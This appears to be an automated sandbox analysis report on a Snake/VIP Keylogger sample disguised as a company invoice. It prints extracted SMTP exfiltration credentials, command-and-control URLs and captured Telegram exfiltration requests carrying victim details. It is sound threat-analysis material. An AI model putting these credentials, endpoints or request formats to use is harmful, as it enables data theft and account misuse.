Source: http://anotherarmy.dns.army:8081	URL Reputation: Label: malware

Found malware configuration

Source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@laime.it", "Password": "Oqc9k0@9", "Host": "mail.laime.it", "Port": "587", "Version": "4.4"}
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "Oqc9k0@9", "Password": "mail.laime.it", "Host": "clone@glamourstorepa.com.br", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Virustotal: Detection: 60%			Perma Link

Multi AV Scanner detection for submitted file

Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Virustotal: Detection: 60%			Perma Link
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe	ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49707 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49717 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49746 version: TLS 1.2

Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then jmp 010AF45Dh	11_2_010AF2C0
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then jmp 010AF45Dh	11_2_010AF4AC
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then jmp 010AFC19h	11_2_010AF961
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then jmp 0692E0A9h	11_2_0692DE00
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then jmp 069231E0h	11_2_06922DC8
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then jmp 06920D0Dh	11_2_06920B30
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then jmp 06921697h	11_2_06920B30
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then jmp 06922C19h	11_2_06922968
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then jmp 0692E959h	11_2_0692E6B0
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	11_2_06920673
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then jmp 0692F209h	11_2_0692EF60
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then jmp 0692CF49h	11_2_0692CCA0
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then jmp 069231E0h	11_2_06922DC3
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then jmp 0692D7F9h	11_2_0692D550
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then jmp 0692E501h	11_2_0692E258
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then jmp 0692F661h	11_2_0692F3B8
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then jmp 0692EDB1h	11_2_0692EB08
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then jmp 0692D3A1h	11_2_0692D0F8
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then jmp 0692FAB9h	11_2_0692F810
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	11_2_06920853
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	11_2_06920040
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then jmp 0692DC51h	11_2_0692D9A8
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 4x nop then jmp 069231E0h	11_2_0692310E
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then jmp 056BF2EDh	20_2_056BF150
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then jmp 056BF2EDh	20_2_056BF33C
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then jmp 056BFAA9h	20_2_056BF804
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then jmp 07030D0Dh	20_2_07030B30
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then jmp 07031697h	20_2_07030B30
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then jmp 07032C21h	20_2_07032970
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then jmp 070331E8h	20_2_07032DD0
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then jmp 0703D1B1h	20_2_0703CF08
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then jmp 0703D609h	20_2_0703D360
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then jmp 0703DA61h	20_2_0703D7B8
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then jmp 0703F8C9h	20_2_0703F620
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	20_2_07030673
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then jmp 0703FD21h	20_2_0703FA78
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then jmp 070331E8h	20_2_07033116
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then jmp 0703EBC1h	20_2_0703E918
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then jmp 0703F019h	20_2_0703ED70
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then jmp 070331E8h	20_2_07032DCA
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then jmp 0703F471h	20_2_0703F1C8
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then jmp 0703DEB9h	20_2_0703DC10
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	20_2_07030040
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	20_2_07030853
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then jmp 0703E311h	20_2_0703E068
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 4x nop then jmp 0703E769h	20_2_0703E4C0

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2030/08/2024%20/%2000:43:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2029/08/2024%20/%2019:20:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49711 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49712 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49723 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49719 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49706 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49710 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49725 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49718 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49715 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49721 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49730 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49720 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49726 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49707 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49717 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2030/08/2024%20/%2000:43:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2029/08/2024%20/%2019:20:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 29 Aug 2024 10:16:34 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 29 Aug 2024 10:16:36 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
